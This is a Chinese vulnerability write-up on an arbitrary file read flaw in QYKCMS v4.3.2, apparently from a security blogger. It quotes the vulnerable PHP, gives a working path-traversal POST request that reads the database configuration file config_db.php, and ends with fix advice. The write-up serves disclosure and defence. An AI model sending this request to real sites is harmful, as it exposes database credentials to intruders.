0x00 环境准备
QYKCMS官网:http://www.qykcms.com/
网站源码版本:QYKCMS_v4.3.2(企业站主题)
程序源码下载:http://bbs.qingyunke.com/thread-13.htm
测试网站首页:
0x01 代码分析
1、漏洞文件位置:/admin_system/include/show/template.php 第1-22行:
- <?php
- $path=strtolower(arg('path','post','url'));
- if(strstr($path,setup_webfolder.$website['webid'].'/')){
- $file=explode(setup_webfolder.$website['webid'].'/',$path);
- $file=$file[1];
- }else{
- $file=$path;
- if(!$website['isadmin'])die('{error:文件不存在}');
- }
10. $content='';
11. $path2=iconv("utf-8","gb2312",$path);
12. if(is_dir($path2)){
- 13. die('{error:暂未支持直接创建文件,请通过上传方式创建}');
14. }else{
- 15. @$ftype=end(explode('.',$path));
- 16. @$content=file_get_contents($path2) or ajaxreturn(1,'文件无法读取,请检查读写权限');
- 17. $content=str_replace('</script>','{script_tag_end}',$content);
- 18. $content=str_replace('{filecode}','{filecode_tag}',$content);
- 19. $content=trim($content,'\r\n');
- 20. $content=trim($content,'\r');
- 21. $content=trim($content,'\n');
- 22. }
这段代码中接收path参数,然后进行转码处理,注意看红色代码部分,接着判断是否是一个目录,然后带入file_get_contents函数中执行,可以看到path参数并未进行任何过滤或处理,导致程序在实现上存在任意文件读取漏洞,可以读取网站任意文件,攻击者可利用该漏洞获取敏感信息。
0x02 漏洞利用
1、QYKCMS默认数据库配置文件存放在\include\config_db.php中,我们构造一个路径去读取数据库敏感信息,成功执行。
http://127.0.0.1/admin_system/api.php
POST: admin=admin&key=682b82f8dc3b753d6eb9ceafd5a64301&log=show&desc=template&path=../include/config_db.php
2、执行成功后,页面空白一片,我们通过右键查看页面源代码,发现config_db.php文件代码已经显示出来了。
0x03 修复建议
1、指定文件读取目录,过滤.(点)等可能的恶意字符,防止目录跳转,最为推荐的方法;
2、正则判断用户输入的参数的格式,看输入的格式是否合法:这个方法的匹配最为准确和细致,但是有很大难度,需要大量时间配置规则。
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
